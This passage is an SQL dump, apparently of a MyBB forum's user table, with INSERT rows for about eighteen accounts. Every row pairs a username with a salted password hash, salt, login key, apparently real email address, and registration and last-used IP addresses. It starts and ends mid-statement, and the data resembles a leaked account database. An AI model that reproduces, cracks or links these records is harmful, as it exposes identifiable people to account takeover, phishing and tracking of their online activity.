`showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('101', 'KFallen', 'b661596736fed6083cba97d1638a1e5c', '9aMLrb9g', 'c7jH63yeig7tdgwc91cNUudJWRHUkLBfBfR8pYD8xRZHlocHTn', 'KFallen97@gmail.com', '12', '', '', '', '2', '', '0', '', '1345731070', '1346379487', '1346107597', '1345867324', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '66.87.4.108', '66.87.4.160', '1112999020', '1112999072', '', '6397', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('113', 'Richy882x', 'e91bf8a79ad37fa286a1eb3b87cd471c', '1yFgBkdD', 'a2b1a94x4iEY3K1qrQlVtg7QI17bnwlUXKgOlnXL1om3yfg8n1', 'southparkdude1234@hotmail.com', '0', '', '', '', '2', '', '0', '', '1345831161', '1345831410', '1345831161', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '92.5.146.21', '92.5.146.21', '1543868949', '1543868949', '', '249', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('114', 'Cute', 'e72ee98c9955c9c76030c8602010c22a', 'vCla7GBo', 'Z3YLRDoBpPvxpz415aQbhBUsnQXsGHEuyLSJYwziKs3Sr7pWjq', 'bananabana22@gmail.com', '0', '', '', '', '2', '', '0', '', '1345833272', '1346109524', '1345833738', '0', '', '0', '', '', '', '', 'all', '', '0', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '82', '0', '0', '70.143.76.31', '70.143.76.31', '1183796255', '1183796255', '', '644', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('116', '@SSASIN', '7d8578dabf4b2f029b53c26a45353553', '6b5ahQuV', 'V3lmDgi48TIWnHOrqaTs2Izj5K6LnywnLIypJkV8QHUgw8uFxN', 'sakariya.a@msn.com', '5', '', '', '', '2', '', '0', '', '1345849083', '1346350994', '1346177110', '1346176198', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '78.148.241.66', '2.98.233.26', '1318383938', '40036634', '', '3011', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('117', 'Brak', '0132180fbbb2858a782247d2a7a6656a', 'vvDckCcm', 'fwdcVRIHO64s7SGpDw4OmLVksMERJdzCBXH3LmMbiXKgrv3I3Z', 'tylercarey.school@gmail.com', '0', '', '', '', '2', '', '0', '', '1345862758', '1345863427', '1345862758', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '67.191.251.20', '67.191.251.20', '1136655124', '1136655124', '', '669', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('119', 'Neal Caffrey', '9a059a03aa1b3b38a5f421be07729a4c', '4wjSSN9n', 'ndDpD6H7IKSaN4vU7kOFHE9cQNZ6u9Rp2cHOuVvTA8dc7P8NZ2', 'solvents@hotmail.com', '3', '', '', '', '2', '', '0', '', '1345873087', '1345900004', '1345873087', '1345899801', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '58.178.177.230', '216.38.2.194', '984789478', '-668597566', '', '632', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('120', 'n431n', '614653875ce6b1ea5e1a2a4f68d9db34', 'gUALeEuT', '2udmmSQySZISvUSwKsn7YbyGUeDMQYpoYDvxStXh6a93WcOQsP', 'kpracas@yahoo.com', '0', '', '', '', '2', '', '0', '', '1345875927', '1345888248', '1345884546', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '182.50.65.67', '182.50.64.67', '-1238220477', '-1238220733', '', '4184', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('121', 'n3m1s', '3e68df8ce472f46137ea07d0e37165b7', 'Ml4UZI9a', 'tiK1Aw7WjJdmpihoA6b8BbfcoURJbH1vcFtOAKH9VeV2A7QS4T', 'nem1s@hotmail.com', '0', '', '', '', '2', '', '0', '', '1345905447', '1345905447', '1345905447', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '83.149.48.17', '', '1402286097', '0', 'english', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('122', 'oddtrey10', '5961ea16bfd1d9515260a987aa42f021', 'QpxtLr2u', 'EB9JwB6IAzx9e1SHZapaNn2P2yg6NxZAIc2LEnla9KXLY9W1Gh', 'Vincent.coakley7@gmail.com', '0', '', '', '', '2', '', '0', '', '1345906437', '1346190350', '1346020621', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '82', '0', '0', '98.219.25.81', '69.15.13.113', '1658526033', '1158614385', '', '6341', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('123', 'GraveDigger', '634e1b1426b3d747448a8d5cae23dd1d', 'nhj31GN7', 'mg2282782uvulG1XM7wh1AiQfDJV89VYqOcTxGYfeWafFydiEt', 'gravedigger1454@yahoo.de', '0', '', '', '', '2', '', '0', '', '1345907236', '1345907481', '1345907236', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '2', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '87.151.195.77', '87.151.195.77', '1469563725', '1469563725', '', '245', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('126', 'simplerule50', '1ee46d86c64f78f73dc137883f57577a', '3FyH7ayl', 'drdGUBSPdXtkxS21bijUzFdny7utnPRsaXjXousLJxNd7A8tqy', 'simplerule50@yahoo.com', '0', '', '', '', '2', '', '0', '', '1345917400', '1345917400', '1345917400', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '23.19.62.111', '', '387137135', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('124', 'FeretikK', '863ce00f5c43c0da74a0b976604ceea6', '3prr2kIl', 'ZD4fw1OmRFVDCyEJVbFvj1WnDCOhmqg3rrTthxRHDOjy6HdLkY', 'audic@live.de', '0', '', '', '', '2', '', '0', '', '1345912406', '1345913832', '1345912406', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '134.3.161.123', '134.3.161.123', '-2046582405', '-2046582405', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('125', 'Jimmy', '5e561fbaad38e712f68141c802c4a438', 'joERm7wD', 'sLhpskhx4pn9Qe2DlYvmodS66O1HfrloqiqUvpyGOJ2VdGTlfp', 'xgamergta@gmail.com', '0', '', '', '', '2', '', '0', '', '1345915607', '1350223657', '1350221186', '0', '', '0', '', '', '', '', 'all', '', '1', '1', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '5.5', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '117.203.212.64', '42.106.175.146', '1976292416', '711634834', '', '796', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('127', 'Eucliwood', '62176920406e9722bdfe149d0100176a', 'xDmWU2e9', 'ykBBA3wnmTnutu3mSS5J7tUBIa9E5DIZvIY3rDaNKNuczKCiLc', 'havard.solgard@hotmail.com', '6', './uploads/avatars/avatar_127.jpg?dateline=1345918362', '106|150', 'upload', '2', '', '0', '', '1345917993', '1348071820', '1347311117', '1346013059', '', '0', '', '', '', '', 'all', '[color=#FF0000]No Adult Content allowed. -Staff[/color]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '2', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '67', '0', '0', '88.90.14.9', '83.109.119.246', '1482296841', '1399683062', '', '5961', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('128', 'Lydian', 'e0fc56b5308916894890222e41ad833b', 'iFWlzUR1', 'O1IY1xHPQjozeKM5dR2ZWIOq8UhrkOQ1vHIUcplgsEyQgEmvEV', 'rabbitfish94@gmail.com', '0', '', '', '', '2', '', '0', '', '1345918240', '1350160938', '1350159283', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '1', '1', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '67', '0', '0', '213.49.119.132', '213.49.101.145', '-718178428', '-718183023', '', '793', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('129', 'Reliant', 